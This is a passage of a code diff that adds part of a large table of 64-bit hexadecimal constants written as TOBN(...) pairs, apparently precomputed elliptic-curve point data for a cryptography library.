+     TOBN(0x9dac57c8, 0x4c5434a7), TOBN(0x0282e5be, 0x59d39e31),
+     TOBN(0xedfff181, 0x721c486d), TOBN(0x301baf10, 0xbc58824e),
+     TOBN(0x8136a6aa, 0x00570031), TOBN(0x55aaf78c, 0x1cddde68),
+     TOBN(0x26829371, 0x59c63952), TOBN(0x3a3bd274, 0x8bc25baf),
+     TOBN(0xecdf8657, 0xb7e52dc3), TOBN(0x2dd8c087, 0xfd78e6c8),
+     TOBN(0x20553274, 0xf5531461), TOBN(0x8b4a1281, 0x5d95499b),
+     TOBN(0xe2c8763a, 0x1a80f9d2), TOBN(0xd1dbe32b, 0x4ddec758),
+     TOBN(0xaf12210d, 0x30c34169), TOBN(0xba74a953, 0x78baa533),
+     TOBN(0x3d133c6e, 0xa438f254), TOBN(0xa431531a, 0x201bef5b),
+     TOBN(0x15295e22, 0xf669d7ec), TOBN(0xca374f64, 0x357fb515),
+     TOBN(0x8a8406ff, 0xeaa3fdb3), TOBN(0x106ae448, 0xdf3f2da8),
+     TOBN(0x8f9b0a90, 0x33c8e9a1), TOBN(0x234645e2, 0x71ad5885),
+     TOBN(0x3d083224, 0x1c0aed14), TOBN(0xf10a7d3e, 0x7a942d46),
+     TOBN(0x7c11deee, 0x40d5c9be), TOBN(0xb2bae7ff, 0xba84ed98),
+     TOBN(0x93e97139, 0xaad58ddd), TOBN(0x3d872796, 0x3f6d1fa3),
+     TOBN(0x483aca81, 0x8569ff13), TOBN(0x8b89a5fb, 0x9a600f72),
+     TOBN(0x4cbc27c3, 0xc06f2b86), TOBN(0x22130713, 0x63ad9c0b),
+     TOBN(0xb5358b1e, 0x48ac2840), TOBN(0x18311294, 0xecba9477),
+     TOBN(0xda58f990, 0xa6946b43), TOBN(0x3098baf9, 0x9ab41819),
+     TOBN(0x66c4c158, 0x4198da52), TOBN(0xab4fc17c, 0x146bfd1b),
+     TOBN(0x2f0a4c3c, 0xbf36a908), TOBN(0x2ae9e34b, 0x58cf7838),
+     TOBN(0xf411529e, 0x3fa11b1f), TOBN(0x21e43677, 0x974af2b4),
+     TOBN(0x7c20958e, 0xc230793b), TOBN(0x710ea885, 0x16e840f3),
+     TOBN(0xfc0b21fc, 0xc5dc67cf), TOBN(0x08d51647, 0x88405718),
+     TOBN(0xd955c21f, 0xcfe49eb7), TOBN(0x9722a5d5, 0x56dd4a1f),
+     TOBN(0xc9ef50e2, 0xc861baa5), TOBN(0xc0c21a5d, 0x9505ac3e),
+     TOBN(0xaf6b9a33, 0x8b7c063f), TOBN(0xc6370339, 0x2f4779c1),
+     TOBN(0x22df99c7, 0x638167c3), TOBN(0xfe6ffe76, 0x795db30c),
+     TOBN(0x2b822d33, 0xa4854989), TOBN(0xfef031dd, 0x30563aa5),
+     TOBN(0x16b09f82, 0xd57c667f), TOBN(0xc70312ce, 0xcc0b76f1),
+     TOBN(0xbf04a9e6, 0xc9118aec), TOBN(0x82fcb419, 0x3409d133),
+     TOBN(0x1a8ab385, 0xab45d44d), TOBN(0xfba07222, 0x617b83a3),
+     TOBN(0xb05f50dd, 0x58e81b52), TOBN(0x1d8db553, 0x21ce5aff),
+     TOBN(0x3097b8d4, 0xe344a873), TOBN(0x7d8d116d, 0xfe36d53e),
+     TOBN(0x6db22f58, 0x7875e750), TOBN(0x2dc5e373, 0x43e144ea),
+     TOBN(0xc05f32e6, 0xe799eb95), TOBN(0xe9e5f4df, 0x6899e6ec),
+     TOBN(0xbdc3bd68, 0x1fab23d5), TOBN(0xb72b8ab7, 0x73af60e6),
+     TOBN(0x8db27ae0, 0x2cecc84a), TOBN(0x600016d8, 0x7bdb871c),
+     TOBN(0x42a44b13, 0xd7c46f58), TOBN(0xb8919727, 0xc3a77d39),
+     TOBN(0xcfc6bbbd, 0xdafd6088), TOBN(0x1a740146, 0x6bd20d39),
+     TOBN(0x8c747abd, 0x98c41072), TOBN(0x4c91e765, 0xbdf68ea1),
+     TOBN(0x7c95e5ca, 0x08819a78), TOBN(0xcf48b729, 0xc9587921),
+     TOBN(0x091c7c5f, 0xdebbcc7d), TOBN(0x6f287404, 0xf0e05149),
+     TOBN(0xf83b5ac2, 0x26cd44ec), TOBN(0x88ae32a6, 0xcfea250e),
+     TOBN(0x6ac5047a, 0x1d06ebc5), TOBN(0xc7e550b4, 0xd434f781),
+     TOBN(0x61ab1cf2, 0x5c727bd2), TOBN(0x2e4badb1, 0x1cf915b0),
+     TOBN(0x1b4dadec, 0xf69d3920), TOBN(0xe61b1ca6, 0xf14c1dfe),
+     TOBN(0x90b479cc, 0xbd6bd51f), TOBN(0x8024e401, 0x8045ec30),
+     TOBN(0xcab29ca3, 0x25ef0e62), TOBN(0x4f2e9416, 0x49e4ebc0),
+     TOBN(0x45eb40ec, 0x0ccced58), TOBN(0x25cd4b9c, 0x0da44f98),
+     TOBN(0x43e06458, 0x871812c6), TOBN(0x99f80d55, 0x16cef651),
+     TOBN(0x571340c9, 0xce6dc153), TOBN(0x138d5117, 0xd8665521),
+     TOBN(0xacdb45bc, 0x4e07014d), TOBN(0x2f34bb38, 0x84b60b91),
+     TOBN(0xf44a4fd2, 0x2ae8921e), TOBN(0xb039288e, 0x892ba1e2),
+     TOBN(0x9da50174, 0xb1c180b2), TOBN(0x6b70ab66, 0x1693dc87),
+     TOBN(0x7e9babc9, 0xe7057481), TOBN(0x4581ddef, 0x9c80dc41),
+     TOBN(0x0c890da9, 0x51294682), TOBN(0x0b5629d3, 0x3f4736e5),
+     TOBN(0x2340c79e, 0xb06f5b41), TOBN(0xa42e84ce, 0x4e243469),
+     TOBN(0xf9a20135, 0x045a71a9), TOBN(0xefbfb415, 0xd27b6fb6),
+     TOBN(0x25ebea23, 0x9d33cd6f), TOBN(0x9caedb88, 0xaa6c0af8),
+     TOBN(0x53dc7e9a, 0xd9ce6f96), TOBN(0x3897f9fd, 0x51e0b15a),
+     TOBN(0xf51cb1f8, 0x8e5d788e), TOBN(0x1aec7ba8, 0xe1d490ee),
+     TOBN(0x265991e0, 0xcc58cb3c), TOBN(0x9f306e8c, 0x9fc3ad31),
+     TOBN(0x5fed006e, 0x5040a0ac), TOBN(0xca9d5043, 0xfb476f2e),
+     TOBN(0xa19c06e8, 0xbeea7a23), TOBN(0xd2865801, 0x0edabb63),
+     TOBN(0xdb92293f, 0x6967469a), TOBN(0x2894d839, 0x8d8a8ed8),
+     TOBN(0x87c9e406, 0xbbc77122), TOBN(0x8671c6f1, 0x2ea3a26a),
+     TOBN(0xe42df8d6, 0xd7de9853), TOBN(0x2e3ce346, 0xb1f2bcc7),
+     TOBN(0xda601dfc, 0x899d50cf), TOBN(0xbfc913de, 0xfb1b598f),
+     TOBN(0x81c4909f, 0xe61f7908), TOBN(0x192e304f, 0x9bbc7b29),
+     TOBN(0xc3ed8738, 0xc104b338), TOBN(0xedbe9e47, 0x783f5d61),
+     TOBN(0x0c06e9be, 0x2db30660), TOBN(0xda3e613f, 0xc0eb7d8e),
+     TOBN(0xd8fa3e97, 0x322e096e), TOBN(0xfebd91e8, 0xd336e247),
+     TOBN(0x8f13ccc4, 0xdf655a49), TOBN(0xa9e00dfc, 0x5eb20210),
+     TOBN(0x84631d0f, 0xc656b6ea), TOBN(0x93a058cd, 0xd8c0d947),
+     TOBN(0x6846904a, 0x67bd3448), TOBN(0x4a3d4e1a, 0xf394fd5c),
+     TOBN(0xc102c1a5, 0xdb225f52), TOBN(0xe3455bba, 0xfc4f5e9a),
+     TOBN(0x6b36985b, 0x4b9ad1ce), TOBN(0xa9818536, 0x5bb7f793),
+     TOBN(0x6c25e1d0, 0x48b1a416), TOBN(0x1381dd53, 0x3c81bee7),
+     TOBN(0xd2a30d61, 0x7a4a7620), TOBN(0xc8412926, 0x39b8944c),
+     TOBN(0x3c1c6fbe, 0x7a97c33a), TOBN(0x941e541d, 0x938664e7),
+     TOBN(0x417499e8, 0x4a34f239), TOBN(0x15fdb83c, 0xb90402d5),
+     TOBN(0xb75f46bf, 0x433aa832), TOBN(0xb61e15af, 0x63215db1),
+     TOBN(0xaabe59d4, 0xa127f89a), TOBN(0x5d541e0c, 0x07e816da),
+     TOBN(0xaaba0659, 0xa618b692), TOBN(0x55327733, 0x17266026),
+     TOBN(0xaf53a0fc, 0x95f57552), TOBN(0x32947650, 0x6cacb0c9),
+     TOBN(0x253ff58d, 0xc821be01), TOBN(0xb0309531, 0xa06f1146),
+     TOBN(0x59bbbdf5, 0x05c2e54d), TOBN(0x158f27ad, 0x26e8dd22),
+     TOBN(0xcc5b7ffb, 0x397e1e53), TOBN(0xae03f65b, 0x7fc1e50d),
+     TOBN(0xa9784ebd, 0x9c95f0f9), TOBN(0x5ed9deb2, 0x24640771),
+     TOBN(0x31244af7, 0x035561c4), TOBN(0x87332f3a, 0x7ee857de),
+     TOBN(0x09e16e9e, 0x2b9e0d88), TOBN(0x52d910f4, 0x56a06049),
+     TOBN(0x507ed477, 0xa9592f48), TOBN(0x85cb917b, 0x2365d678),
+     TOBN(0xf8511c93, 0x4c8998d1), TOBN(0x2186a3f1, 0x730ea58f),
+     TOBN(0x50189626, 0xb2029db0), TOBN(0x9137a6d9, 0x02ceb75a),
+     TOBN(0x2fe17f37, 0x748bc82c), TOBN(0x87c2e931, 0x80469f8c),
+     TOBN(0x850f71cd, 0xbf891aa2), TOBN(0x0ca1b89b, 0x75ec3d8d),
+     TOBN(0x516c43aa, 0x5e1cd3cd), TOBN(0x89397808, 0x9a887c28),
+     TOBN(0x0059c699, 0xddea1f9f), TOBN(0x7737d6fa, 0x8e6868f7),
+     TOBN(0x6d93746a, 0x60f1524b), TOBN(0x36985e55, 0xba052aa7),
+     TOBN(0x41b1d322, 0xed923ea5), TOBN(0x3429759f, 0x25852a11),
+     TOBN(0xbeca6ec3, 0x092e9f41), TOBN(0x3a238c66, 0x62256bbd),
+     TOBN(0xd82958ea, 0x70ad487d), TOBN(0x4ac8aaf9, 0x65610d93),
+     TOBN(0x3fa101b1, 0x5e4ccab0), TOBN(0x9bf430f2, 0x9de14bfb),
+     TOBN(0xa10f5cc6, 0x6531899d), TOBN(0x590005fb, 0xea8ce17d),
+     TOBN(0xc437912f, 0x24544cb6), TOBN(0x9987b71a, 0xd79ac2e3),
+     TOBN(0x13e3d9dd, 0xc058a212), TOBN(0x00075aac, 0xd2de9606),
+     TOBN(0x80ab508b, 0x6cac8369), TOBN(0x87842be7, 0xf54f6c89),
+     TOBN(0xa7ad663d, 0x6bc532a4), TOBN(0x67813de7, 0x78a91bc8),
+     TOBN(0x5dcb61ce, 0xc3427239), TOBN(0x5f3c7cf0, 0xc56934d9),
+     TOBN(0xc079e0fb, 0xe3191591), TOBN(0xe40896bd, 0xb01aada7),
+     TOBN(0x8d466791, 0x0492d25f), TOBN(0x8aeb30c9, 0xe7408276),
+     TOBN(0xe9437495, 0x9287aacc), TOBN(0x23d4708d, 0x79fe03d4),
+     TOBN(0x8cda9cf2, 0xd0c05199), TOBN(0x502fbc22, 0xfae78454),
+     TOBN(0xc0bda9df, 0xf572a182), TOBN(0x5f9b71b8, 0x6158b372),
+     TOBN(0xe0f33a59, 0x2b82dd07), TOBN(0x76302735, 0x9523032e),
+     TOBN(0x7fe1a721, 0xc4505a32), TOBN(0x7b6e3e82, 0xf796409f),}
+    ,
+    {TOBN(0xe3417bc0, 0x35d0b34a), TOBN(0x440b386b, 0x8327c0a7),
+     TOBN(0x8fb7262d, 0xac0362d1), TOBN(0x2c41114c, 0xe0cdf943),
+     TOBN(0x2ba5cef1, 0xad95a0b1), TOBN(0xc09b37a8, 0x67d54362),
+     TOBN(0x26d6cdd2, 0x01e486c9), TOBN(0x20477abf, 0x42ff9297),
+     TOBN(0xa004dcb3, 0x292a9287), TOBN(0xddc15cf6, 0x77b092c7),
+     TOBN(0x083a8464, 0x806c0605), TOBN(0x4a68df70, 0x3db997b0),
+     TOBN(0x9c134e45, 0x05bf7dd0), TOBN(0xa4e63d39, 0x8ccf7f8c),
+     TOBN(0xa6e6517f, 0x41b5f8af), TOBN(0xaa8b9342, 0xad7bc1cc),
+     TOBN(0x126f35b5, 0x1e706ad9), TOBN(0xb99cebb4, 0xc3a9ebdf),
+     TOBN(0xa75389af, 0xbf608d90), TOBN(0x76113c4f, 0xc6c89858),
+     TOBN(0x80de8eb0, 0x97e2b5aa), TOBN(0x7e1022cc, 0x63b91304),
+     TOBN(0x3bdab605, 0x6ccc066c), TOBN(0x33cbb144, 0xb2edf900),
+     TOBN(0xc4176471, 0x7af715d2), TOBN(0xe2f7f594, 0xd0134a96),
+     TOBN(0x2c1873ef, 0xa41ec956), TOBN(0xe4e7b4f6, 0x77821304),
+     TOBN(0xe5c8ff97, 0x88d5374a), TOBN(0x2b915e63, 0x80823d5b),
+     TOBN(0xea6bc755, 0xb2ee8fe2), TOBN(0x6657624c, 0xe7112651),
+     TOBN(0x157af101, 0xdace5aca), TOBN(0xc4fdbcf2, 0x11a6a267),
+     TOBN(0xdaddf340, 0xc49c8609), TOBN(0x97e49f52, 0xe9604a65),
+     TOBN(0x9be8e790, 0x937e2ad5), TOBN(0x846e2508, 0x326e17f1),
+     TOBN(0x3f38007a, 0x0bbbc0dc), TOBN(0xcf03603f, 0xb11e16d6),
+     TOBN(0xd6f800e0, 0x7442f1d5), TOBN(0x475607d1, 0x66e0e3ab),
+     TOBN(0x82807f16, 0xb7c64047), TOBN(0x8858e1e3, 0xa749883d),
+     TOBN(0x5859120b, 0x8231ee10), TOBN(0x1b80e7eb, 0x638a1ece),
+     TOBN(0xcb72525a, 0xc6aa73a4), TOBN(0xa7cdea3d, 0x844423ac),
+     TOBN(0x5ed0c007, 0xf8ae7c38), TOBN(0x6db07a5c, 0x3d740192),
+     TOBN(0xbe5e9c2a, 0x5fe36db3), TOBN(0xd5b9d57a, 0x76e95046),
+     TOBN(0x54ac32e7, 0x8eba20f2), TOBN(0xef11ca8f, 0x71b9a352),
+     TOBN(0x305e373e, 0xff98a658), TOBN(0xffe5a100, 0x823eb667),
+     TOBN(0x57477b11, 0xe51732d2), TOBN(0xdfd6eb28, 0x2538fc0e),
+     TOBN(0x5c43b0cc, 0x3b39eec5), TOBN(0x6af12778, 0xcb36cc57),
+     TOBN(0x70b0852d, 0x06c425ae), TOBN(0x6df92f8c, 0x5c221b9b),
+     TOBN(0x6c8d4f9e, 0xce826d9c), TOBN(0xf59aba7b, 0xb49359c3),
+     TOBN(0x5c8ed8d5, 0xda64309d), TOBN(0x61a6de56, 0x91b30704),
+     TOBN(0xd6b52f6a, 0x2f9b5808), TOBN(0x0eee4194, 0x98c958a7),
+     TOBN(0xcddd9aab, 0x771e4caa), TOBN(0x83965dfd, 0x78bc21be),
+     TOBN(0x02affce3, 0xb3b504f5), TOBN(0x30847a21, 0x561c8291),
+     TOBN(0xd2eb2cf1, 0x52bfda05), TOBN(0xe0e4c4e9, 0x6197b98c),
+     TOBN(0x1d35076c, 0xf8a1726f), TOBN(0x6c06085b, 0x2db11e3d),
+     TOBN(0x15c0c4d7, 0x4463ba14), TOBN(0x9d292f83, 0x0030238c),
+     TOBN(0x1311ee8b, 0x3727536d), TOBN(0xfeea86ef, 0xbeaedc1e),
+     TOBN(0xb9d18cd3, 0x66131e2e), TOBN(0xf31d974f, 0x80fe2682),
+     TOBN(0xb6e49e0f, 0xe4160289), TOBN(0x7c48ec0b, 0x08e92799),
+     TOBN(0x818111d8, 0xd1989aa7), TOBN(0xb34fa0aa, 0xebf926f9),
+     TOBN(0xdb5fe2f5, 0xa245474a), TOBN(0xf80a6ebb, 0x3c7ca756),
+     TOBN(0xa7f96054, 0xafa05dd8), TOBN(0x26dfcf21, 0xfcaf119e),
+     TOBN(0xe20ef2e3, 0x0564bb59), TOBN(0xef4dca50, 0x61cb02b8),
+     TOBN(0xcda7838a, 0x65d30672), TOBN(0x8b08d534, 0xfd657e86),
+     TOBN(0x4c5b4395, 0x46d595c8), TOBN(0x39b58725, 0x425cb836),
+     TOBN(0x8ea61059, 0x3de9abe3), TOBN(0x40434881, 0x9cdc03be),
+     TOBN(0x9b261245, 0xcfedce8c), TOBN(0x78c318b4, 0xcf5234a1),
+     TOBN(0x510bcf16, 0xfde24c99), TOBN(0x2a77cb75, 0xa2c2ff5d),
+     TOBN(0x9c895c2b, 0x27960fb4), TOBN(0xd30ce975, 0xb0eda42b),
+     TOBN(0xfda85393, 0x1a62cc26), TOBN(0x23c69b96, 0x50c0e052),
+     TOBN(0xa227df15, 0xbfc633f3), TOBN(0x2ac78848, 0x1bae7d48),
+     TOBN(0x487878f9, 0x187d073d), TOBN(0x6c2be919, 0x967f807d),
+     TOBN(0x765861d8, 0x336e6d8f), TOBN(0x88b8974c, 0xce528a43),
+     TOBN(0x09521177, 0xff57d051), TOBN(0x2ff38037, 0xfb6a1961),
+     TOBN(0xfc0aba74, 0xa3d76ad4), TOBN(0x7c764803, 0x25a7ec17),
+     TOBN(0x7532d75f, 0x48879bc8), TOBN(0xea7eacc0, 0x58ce6bc1),
+     TOBN(0xc82176b4, 0x8e896c16), TOBN(0x9a30e0b2, 0x2c750fed),
+     TOBN(0xc37e2c2e, 0x421d3aa4), TOBN(0xf926407c, 0xe84fa840),
+     TOBN(0x18abc03d, 0x1454e41c), TOBN(0x26605ecd, 0x3f7af644),
+     TOBN(0x242341a6, 0xd6a5eabf), TOBN(0x1edb84f4, 0x216b668e),
+     TOBN(0xd836edb8, 0x04010102), TOBN(0x5b337ce7, 0x945e1d8c),
+     TOBN(0xd2075c77, 0xc055dc14), TOBN(0x2a0ffa25, 0x81d89cdf),
+     TOBN(0x8ce815ea, 0x6ffdcbaf), TOBN(0xa3428878, 0xfb648867),
+     TOBN(0x277699cf, 0x884655fb), TOBN(0xfa5b5bd6, 0x364d3e41),
+     TOBN(0x01f680c6, 0x441e1cb7), TOBN(0x3fd61e66, 0xb70a7d67),
+     TOBN(0x666ba2dc, 0xcc78cf66), TOBN(0xb3018174, 0x6fdbff77),
+     TOBN(0x8d4dd0db, 0x168d4668), TOBN(0x259455d0, 0x1dab3a2a),
+     TOBN(0xf58564c5, 0xcde3acec), TOBN(0x77141925, 0x13adb276),
+     TOBN(0x527d725d, 0x8a303f65), TOBN(0x55deb6c9, 0xe6f38f7b),
+     TOBN(0xfd5bb657, 0xb1fa70fb), TOBN(0xfa07f50f, 0xd8073a00),
+     TOBN(0xf72e3aa7, 0xbca02500), TOBN(0xf68f895d, 0x9975740d),
+     TOBN(0x30112060, 0x5cae2a6a), TOBN(0x01bd7218, 0x02874842),
+     TOBN(0x3d423891, 0x7ce47bd3), TOBN(0xa66663c1, 0x789544f6),
+     TOBN(0x864d05d7, 0x3272d838), TOBN(0xe22924f9, 0xfa6295c5),
+     TOBN(0x8189593f, 0x6c2fda32), TOBN(0x330d7189, 0xb184b544),
+     TOBN(0x79efa62c, 0xbde1f714), TOBN(0x35771c94, 0xe5cb1a63),
+     TOBN(0x2f4826b8, 0x641c8332), TOBN(0x00a894fb, 0xc8cee854),
+     TOBN(0xb4b9a39b, 0x36194d40), TOBN(0xe857a7c5, 0x77612601),
+     TOBN(0xf4209dd2, 0x4ecf2f58), TOBN(0x82b9e66d, 0x5a033487),
+     TOBN(0xc1e36934, 0xe4e8b9dd), TOBN(0xd2372c9d, 0xa42377d7),
+     TOBN(0x51dc94c7, 0x0e3ae43b), TOBN(0x4c57761e, 0x04474f6f),
+     TOBN(0xdcdacd0a, 0x1058a318), TOBN(0x369cf3f5, 0x78053a9a),
+     TOBN(0xc6c3de50, 0x31c68de2), TOBN(0x4653a576, 0x3c4b6d9f),
+     TOBN(0x1688dd5a, 0xaa4e5c97), TOBN(0x5be80aa1, 0xb7ab3c74),
+     TOBN(0x70cefe7c, 0xbc65c283), TOBN(0x57f95f13, 0x06867091),
+     TOBN(0xa39114e2, 0x4415503b), TOBN(0xc08ff7c6, 0x4cbb17e9),
+     TOBN(0x1eff674d, 0xd7dec966), TOBN(0x6d4690af, 0x53376f63),
+     TOBN(0xff6fe32e, 0xea74237b), TOBN(0xc436d17e, 0xcd57508e),
+     TOBN(0x15aa28e1, 0xedcc40fe), TOBN(0x0d769c04, 0x581bbb44),
+     TOBN(0xc240b6de, 0x34eaacda), TOBN(0xd9e116e8, 0x2ba0f1de),
+     TOBN(0xcbe45ec7, 0x79438e55), TOBN(0x91787c9d, 0x96f752d7),
+     TOBN(0x897f532b, 0xf129ac2f), TOBN(0xd307b7c8, 0x5a36e22c),
+     TOBN(0x91940675, 0x749fb8f3), TOBN(0xd14f95d0, 0x157fdb28),
+     TOBN(0xfe51d029, 0x6ae55043), TOBN(0x8931e98f, 0x44a87de1),
+     TOBN(0xe57f1cc6, 0x09e4fee2), TOBN(0x0d063b67, 0x4e072d92),
+     TOBN(0x70a998b9, 0xed0e4316), TOBN(0xe74a736b, 0x306aca46),
+     TOBN(0xecf0fbf2, 0x4fda97c7), TOBN(0xa40f65cb, 0x3e178d93),
+     TOBN(0x16253604, 0x16df4285), TOBN(0xb0c9babb, 0xd0c56ae2),
+     TOBN(0x73032b19, 0xcfc5cfc3), TOBN(0xe497e5c3, 0x09752056),
+     TOBN(0x12096bb4, 0x164bda96), TOBN(0x1ee42419, 0xa0b74da1),
+     TOBN(0x8fc36243, 0x403826ba), TOBN(0x0c8f0069, 0xdc09e660),
+     TOBN(0x8667e981, 0xc27253c9), TOBN(0x05a6aefb, 0x92b36a45),
+     TOBN(0xa62c4b36, 0x9cb7bb46), TOBN(0x8394f375, 0x11f7027b),
+     TOBN(0x747bc79c, 0x5f109d0f), TOBN(0xcad88a76, 0x5b8cc60a),
+     TOBN(0x80c5a66b, 0x58f09e68), TOBN(0xe753d451, 0xf6127eac),
+     TOBN(0xc44b74a1, 0x5b0ec6f5), TOBN(0x47989fe4, 0x5289b2b8),
+     TOBN(0x745f8484, 0x58d6fc73), TOBN(0xec362a6f, 0xf61c70ab),
+     TOBN(0x070c98a7, 0xb3a8ad41), TOBN(0x73a20fc0, 0x7b63db51),
+     TOBN(0xed2c2173, 0xf44c35f4), TOBN(0x8a56149d, 0x9acc9dca),
+     TOBN(0x98f17881, 0x9ac6e0f4), TOBN(0x360fdeaf, 0xa413b5ed),
+     TOBN(0x0625b8f4, 0xa300b0fd), TOBN(0xf1f4d76a, 0x5b3222d3),
+     TOBN(0x9d6f5109, 0x587f76b8), TOBN(0x8b4ee08d, 0x2317fdb5),
+     TOBN(0x88089bb7, 0x8c68b095), TOBN(0x95570e9a, 0x5808d9b9),
+     TOBN(0xa395c36f, 0x35d33ae7), TOBN(0x200ea123, 0x50bb5a94),
+     TOBN(0x20c789bd, 0x0bafe84b), TOBN(0x243ef52d, 0x0919276a),
+     TOBN(0x3934c577, 0xe23ae233), TOBN(0xb93807af, 0xa460d1ec),
+     TOBN(0xb72a53b1, 0xf8fa76a4), TOBN(0xd8914cb0, 0xc3ca4491),
+     TOBN(0x2e128494, 0x3fb42622), TOBN(0x3b2700ac, 0x500907d5),
+     TOBN(0xf370fb09, 0x1a95ec63), TOBN(0xf8f30be2, 0x31b6dfbd),
+     TOBN(0xf2b2f8d2, 0x69e55f15), TOBN(0x1fead851, 0xcc1323e9),
+     TOBN(0xfa366010, 0xd9e5eef6), TOBN(0x64d487b0, 0xe316107e),
+     TOBN(0x4c076b86, 0xd23ddc82), TOBN(0x03fd344c, 0x7e0143f0),
+     TOBN(0xa95362ff, 0x317af2c5), TOBN(0x0add3db7, 0xe18b7a4f),
+     TOBN(0x9c673e3f, 0x8260e01b), TOBN(0xfbeb49e5, 0x54a1cc91),
+     TOBN(0x91351bf2, 0x92f2e433), TOBN(0xc755e7ec, 0x851141eb),
+     TOBN(0xc9a95139, 0x29607745), TOBN(0x0ca07420, 0xa26f2b28),
+     TOBN(0xcb2790e7, 0x4bc6f9dd), TOBN(0x345bbb58, 0xadcaffc0),
+     TOBN(0xc65ea38c, 0xbe0f27a2), TOBN(0x67c24d7c, 0x641fcb56),
+     TOBN(0x2c25f0a7, 0xa9e2c757), TOBN(0x93f5cdb0, 0x16f16c49),
+     TOBN(0x2ca5a9d7, 0xc5ee30a1), TOBN(0xd1593635, 0xb909b729),
+     TOBN(0x804ce9f3, 0xdadeff48), TOBN(0xec464751, 0xb07c30c3),
+     TOBN(0x89d65ff3, 0x9e49af6a), TOBN(0xf2d6238a, 0x6f3d01bc),
+     TOBN(0x1095561e, 0x0bced843), TOBN(0x51789e12, 0xc8a13fd8),
+     TOBN(0xd633f929, 0x763231df), TOBN(0x46df9f7d, 0xe7cbddef),
+     TOBN(0x01c889c0, 0xcb265da8), TOBN(0xfce1ad10, 0xaf4336d2),
+     TOBN(0x8d110df6, 0xfc6a0a7e), TOBN(0xdd431b98, 0x6da425dc),
+     TOBN(0xcdc4aeab, 0x1834aabe), TOBN(0x84deb124, 0x8439b7fc),
+     TOBN(0x8796f169, 0x3c2a5998), TOBN(0x9b9247b4, 0x7947190d),
+     TOBN(0x55b9d9a5, 0x11597014), TOBN(0x7e9dd70d, 0x7b1566ee),
+     TOBN(0x94ad78f7, 0xcbcd5e64), TOBN(0x0359ac17, 0x9bd4c032),
+     TOBN(0x3b11baaf, 0x7cc222ae), TOBN(0xa6a6e284, 0xba78e812),
+     TOBN(0x8392053f, 0x24cea1a0), TOBN(0xc97bce4a, 0x33621491),
+     TOBN(0x7eb1db34, 0x35399ee9), TOBN(0x473f78ef, 0xece81ad1),
+     TOBN(0x41d72fe0, 0xf63d3d0d), TOBN(0xe620b880, 0xafab62fc),
+     TOBN(0x92096bc9, 0x93158383), TOBN(0x41a21357, 0x8f896f6c),
+     TOBN(0x1b5ee2fa, 0xc7dcfcab), TOBN(0x650acfde, 0x9546e007),
+     TOBN(0xc081b749, 0xb1b02e07), TOBN(0xda9e41a0, 0xf9eca03d),
+     TOBN(0x013ba727, 0x175a54ab), TOBN(0xca0cd190, 0xea5d8d10),
+     TOBN(0x85ea52c0, 0x95fd96a9), TOBN(0x2c591b9f, 0xbc5c3940),
+     TOBN(0x6fb4d4e4, 0x2bad4d5f), TOBN(0xfa4c3590, 0xfef0059b),
+     TOBN(0x6a10218a, 0xf5122294), TOBN(0x9a78a81a, 0xa85751d1),
+     TOBN(0x04f20579, 0xa98e84e7), TOBN(0xfe1242c0, 0x4997e5b5),
+     TOBN(0xe77a273b, 0xca21e1e4), TOBN(0xfcc8b1ef, 0x9411939d),
+     TOBN(0xe20ea302, 0x92d0487a), TOBN(0x1442dbec, 0x294b91fe),
+     TOBN(0x1f7a4afe, 0xbb6b0e8f), TOBN(0x1700ef74, 0x6889c318),
+     TOBN(0xf5bbffc3, 0x70f1fc62), TOBN(0x3b31d4b6, 0x69c79cca),
+     TOBN(0xe8bc2aab, 0xa7f6340d), TOBN(0xb0b08ab4, 0xa725e10a),
+     TOBN(0x44f05701, 0xae340050), TOBN(0xba4b3016, 0x1cf0c569),
+     TOBN(0x5aa29f83, 0xfbe19a51), TOBN(0x1b9ed428, 0xb71d752e),
+     TOBN(0x1666e54e, 0xeb4819f5), TOBN(0x616cdfed, 0x9e18b75b),
+     TOBN(0x112ed5be, 0x3ee27b0b), TOBN(0xfbf28319, 0x44c7de4d),
+     TOBN(0xd685ec85, 0xe0e60d84), TOBN(0x68037e30, 0x1db7ee78),
+     TOBN(0x5b65bdcd, 0x003c4d6e), TOBN(0x33e7363a, 0x93e29a6a),
+     TOBN(0x995b3a61, 0x08d0756c), TOBN(0xd727f85c, 0x2faf134b),
+     TOBN(0xfac6edf7, 0x1d337823), TOBN(0x99b9aa50, 0x0439b8b4),
+     TOBN(0x722eb104, 0xe2b4e075), TOBN(0x49987295, 0x437c4926),
+     TOBN(0xb1e4c0e4, 0x46a9b82d), TOBN(0xd0cb3197, 0x57a006f5),
+     TOBN(0xf3de0f7d, 0xd7808c56), TOBN(0xb5c54d8f, 0x51f89772),
+     TOBN(0x500a114a, 0xadbd31aa), TOBN(0x9afaaaa6, 0x295f6cab),
+     TOBN(0x94705e21, 0x04cf667a), TOBN(0xfc2a811b, 0x9d3935d7),
+     TOBN(0x560b0280, 0x6d09267c), TOBN(0xf19ed119, 0xf780e53b),
+     TOBN(0xf0227c09, 0x067b6269), TOBN(0x967b8533, 0x5caef599),
+     TOBN(0x155b9243, 0x68efeebc), TOBN(0xcd6d34f5, 0xc497bae6),
+     TOBN(0x1dd8d5d3, 0x6cceb370), TOBN(0x2aeac579, 0xa78d7bf9),
+     TOBN(0x5d65017d, 0x70b67a62), TOBN(0x70c8e44f, 0x17c53f67),
+     TOBN(0xd1fc0950, 0x86a34d09), TOBN(0xe0fca256, 0xe7134907),
+     TOBN(0xe24fa29c, 0x80fdd315), TOBN(0x2c4acd03, 0xd87499ad),
+     TOBN(0xbaaf7517, 0x3b5a9ba6), TOBN(0xb9cbe1f6, 0x12e51a51),
+     TOBN(0xd88edae3, 0x5e154897), TOBN(0xe4309c3c, 0x77b66ca0),
+     TOBN(0xf5555805, 0xf67f3746), TOBN(0x85fc37ba, 0xa36401ff),
+     TOBN(0xdf86e2ca, 0xd9499a53), TOBN(0x6270b2a3, 0xecbc955b),
+     TOBN(0xafae64f5, 0x974ad33b), TOBN(0x04d85977, 0xfe7b2df1),
+     TOBN(0x2a3db3ff, 0x4ab03f73), TOBN(0x0b87878a, 0x8702740a),
+     TOBN(0x6d263f01, 0x5a061732), TOBN(0xc25430ce, 0xa32a1901),
+     TOBN(0xf7ebab3d, 0xdb155018), TOBN(0x3a86f693, 0x63a9b78e),
+     TOBN(0x349ae368, 0xda9f3804), TOBN(0x470f07fe, 0xa164349c),
+     TOBN(0xd52f4cc9, 0x8562baa5), TOBN(0xc74a9e86, 0x2b290df3),
+     TOBN(0xd3a1aa35, 0x43471a24), TOBN(0x239446be, 0xb8194511),
